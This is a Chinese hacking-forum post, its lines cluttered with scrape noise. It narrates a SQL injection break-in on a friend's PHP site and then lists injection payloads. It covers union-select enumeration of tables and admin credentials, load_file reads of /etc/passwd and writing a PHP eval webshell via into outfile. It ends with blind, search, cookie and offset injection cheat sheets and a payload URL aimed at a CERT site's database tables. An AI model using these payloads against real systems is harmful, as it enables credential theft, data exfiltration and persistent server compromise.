我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
$ A& K" @. m1 D让我看看,既然人家开口了,我也不好拒绝,那就看看吧?; \. y2 s7 H! _2 T+ L9 g' e1 \
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。# E( q) ~( x+ `, Q% p
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
4 C+ v4 |* D) b* S+ a1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
8 h) _9 |! Z" H这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
4 k& X% G) f( _" V6 MWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
8 c; \9 L9 ?# J2 S: Q5 w( T4 t/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
( P, _, g5 m |5 n" U- H/ @- @
+ _1 R) b# }8 J- j5 O2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,% T+ q; e' `) r( X7 x5 t7 e* z
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
5 _* f7 I! f+ ?4 U4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
0 _) b6 R$ P+ k7 U7 u5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
0 D- i3 C% }6 U7 g p; q) K有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
( K: C g2 A4 }0 [6 W, K3 \2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
8 s- o, W4 x+ r$ H6 m- v! Z我就用的是第二个思路,% d4 N. G% R7 b( X0 n" Z
提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- # O* M$ S: Y( C; S0 m5 Q [) @
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,- q2 X. s; c5 y' a5 ~8 Q' l
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
V8 H% O& s& h7 i注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。6 c$ p8 r/ R2 v: C5 p. y/ p7 [
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
# I$ Q: d2 Z( t* [/ F) M! |是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
3 x; j% ~' `; J/ c提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
& | x7 d8 p- b+ r3 ^" j6 q0 ]然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,/ W- H2 T- ?1 T& E* o I
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
, \6 Q5 |& v" z2 C: P( y) q$ T下面是一些很普遍注入方式资料:) v8 V7 N* T/ e( A) v" L* i
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=', E7 y3 c! I+ M1 ?( O# n1 x: A
拆半法
4 m0 V1 |( D7 K######################################. Y) g4 T: e! b7 p U7 G
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。. H, w0 T. L$ z. @7 f
and exists (select * from admin). h3 J# A6 q* f4 r. {+ o
and exists(select id from admin)
( ^! D; x) r' x- w' qand exists(select id from admin where id=1) a R4 X' [* t) R9 e- K
and exists(select id from admin where id>1)
0 i# L9 o+ w* U' ~7 f# ]& l然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 ( Q& j; E2 K/ Q
and exists (select username from admin). {+ }. U; ~2 @4 T3 ]+ Y0 `
and exists (select password from admin)2 H2 I* u5 @4 ^7 O' m- L
and exists (select id from admin where len(username)<10 and id=1)1 X8 J; q9 Z- c7 c
and exists (select id from admin where len(username)>5 and id=1)
2 S0 e( ] z# @% T) P- ~2 d% |% Oand exists (select id from admin where len(username)=6 and id=1). F/ M& e* E R7 B5 x# q8 B( E' A# b
and exists (select id from admin where len(password)<10 and id=1)
0 W: Z; X, z7 y- cand exists (select id from admin where len(password)>5 and id=1)
5 c( T( D+ M" ] M% Tand exists (select id from admin where len(password)=7 and id=1)
% l# E2 H9 X; L8 s" \& z; t3 rand (select top 1 asc(mid(username,1,1)) from admin)=97
, [; A. G# K0 R: B$ Q返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。( z+ Z& K6 B9 x: w t) L7 j' k }
猜第二位把username,1,1改成username,2,1就可以了。: E. m4 W( C8 Y& n; A
猜密码把username改成password就OK了3 G B( p" q: ~, M3 ]& V
##################################################
* ^6 e! m# G" @- X搜索型注入7 |7 G' d& v/ c) e# r+ B4 i
##################################9 o. \* n% C: E2 j
%' and 1=1 and '%'='
- H$ f+ v5 @* U, { c/ G%' and exists (select * from admin) and '%'='; |1 i' |6 O2 _' e2 h0 Z3 r8 Y) {
%' and exists(select id from admin where id=1) and '%'=', f, P, S: Z/ i W8 p9 T0 Q
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='! r4 Z: T, y- ?3 `& F
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
6 C; I$ b' _6 Q% O- I4 l%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
0 u% }0 k* L5 P0 n0 C: ?0 _% t这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='- M8 R2 z/ E+ V& Y$ x+ `
对于MSSQL数据库,后面可以吧 and '%'='换成--
" V8 [; l# R1 z/ q. G) C$ N& R还有一点搜索型注入也可以使用union语句。( k- E1 E3 `# \& [; M5 O/ F
########################################################: m8 W n( F% B& `! w
联合查询。
5 U- E: x; v/ E( v* _#####################################
( C& v M1 o! ~order by 10! p0 N8 n" m1 p* V% r4 m+ u
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
n; h/ _4 x4 F& ^( ^# p. N0 dand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
6 Z5 s9 [& W6 p, pand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=10 [! ?- W4 b4 @' n6 @& M
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)+ b( F7 ~+ Y% _: z
###################################
# B8 @4 I7 V& Mcookie注入' a4 s# s+ X4 D! B$ E4 Q+ J9 `. A
###############################
3 X# w5 o# l( m) {' U/ l3 l: shttp://www.******.com/shownews.asp?id=1271 C9 I& T& X) c9 V) Q% P
http://www.******.com/shownews.asp
" i: O% B, M. Qalert(="id="+escape("127"));
" V9 u$ F5 p# s# Walert(="id="+escape("127 and 1=1"));
9 D" X: \+ M9 ^alert(="id="+escape("127 order by 10"));. T6 v6 X' e1 N8 Q P: W
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
; t1 E3 z f ~2 N2 b3 palert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));! v6 c0 N" h! @1 G1 W( ], c
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。 }9 H9 P! b0 g$ G" P( r2 ]+ b
################################### g- L' G/ h) z; Y. o* d7 x6 U) h
偏移注入# j& {/ ^* Z, ]$ j3 i& L0 f
###########################################################
; N" |4 d8 @1 b+ D9 @7 munion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin# P) ]* `: T0 I
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin- W+ E$ S+ G- J6 W6 ^9 g5 p2 y
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
$ y& @; i; M5 Q: V( V1 z+ Ounion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
) ?; x! G! v s/ iunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
4 v1 _2 X) ^" M2 w, ^union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)6 ?7 S. j% V! s, ?, m* v5 N
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on9 `6 T1 f+ W" |
a.id=d.id)
8 h! Z, m/ ]- @* X* I6 ]and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
5 O, E0 }. l: n! N; j, I* H- @- Tand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) % F" g, m! w; y
5 l( u8 r* s% g7 s$ s* |, e( t" O============================================================================================================
7 e) C4 z7 n4 k0 M J* z1.判断版本5 G1 c' `6 ~; R. O4 b
and ord(mid(version(),1,1))>51
9 X% y# b7 T' k; F返回正常,说明大于4.0版本,支持ounion查询
_) x, A, C: O2 h& }% E, R2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解: B* A& d, @" X8 s! G
and 2=4 union select 1,2,3,4,5,6,7,8,9--
) e* O- P( K# |, J2 F3 @3.查看数据库版本及当前用户,& m/ G! ~3 v7 C& N6 w% W9 U
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--2 R. i: e- K7 Y/ Y' _0 t
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
) H4 T5 z5 M8 g4.判断有没有写权限. O& }) ~3 H1 f; J* T
and (select count(*) from MySQL.user)>0-- 7 l, q/ Q; R. e" V% C
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1 u! @# H( X" b% D
用不了这个命令,就学习土耳其黑客手法,如下
& L5 F, W5 A* ^3 uand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
' Q7 L4 |0 s4 T/ a. P6.爆表,爆库
, |% D% f3 K1 }& @. Pand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--- I6 ^' c' c% K1 J5 b U4 S
7.爆列名,爆表& @) V- S6 w u% I. C M$ p
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--9 @4 g- @1 M( ]; n4 x
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
! A: a% R- c8 q' {and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--8 v: B* G( s$ o5 k5 }7 [9 E- k
9.爆字段内容
" G2 R) b( ~& K) Y! d* \7 ?) ]; nand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--) O: O) H0 i3 S
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |